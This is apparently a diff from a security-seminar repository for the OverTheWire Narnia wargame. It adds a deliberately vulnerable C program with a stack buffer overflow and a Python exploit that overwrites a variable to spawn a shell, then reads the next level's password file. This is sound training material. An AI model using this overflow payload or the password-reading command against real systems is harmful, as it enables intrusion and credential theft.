Семинар по OTW Narnia0-2

tasks/pwn/narnia/narnia0/narnia0.c

@@ -0,0 +1,40 @@
+/*
+   This program is free software; you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation; either version 2 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program; if not, write to the Free Software
+   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+   */
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(){
+    long val=0x41414141;
+    char buf[20];
+
+    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
+    printf("Here is your chance: ");
+    scanf("%24s",&buf);
+
+    printf("buf: %s\n",buf);
+    printf("val: 0x%08x\n",val);
+
+    if(val==0xdeadbeef){
+        setreuid(geteuid(),geteuid());
+        system("/bin/sh");
+    }
+    else {
+        printf("WAY OFF!!!!\n");
+        exit(1);
+    }
+
+    return 0;
+}

tasks/pwn/narnia/narnia0/narnia0_exploit.py

@@ -0,0 +1,13 @@
+#!/bin/python3
+import time
+import sys
+
+# exploit buffer overflow
+sys.stdout.buffer.write(b"\x90" * 20 + b"\xef\xbe\xad\xde")
+
+# sync script stdout to narnia0 stdin and wait some time
+sys.stdout.flush()
+time.sleep(1)
+
+# command to get our next password
+sys.stdout.buffer.write(b"cat /etc/narnia_pass/narnia1")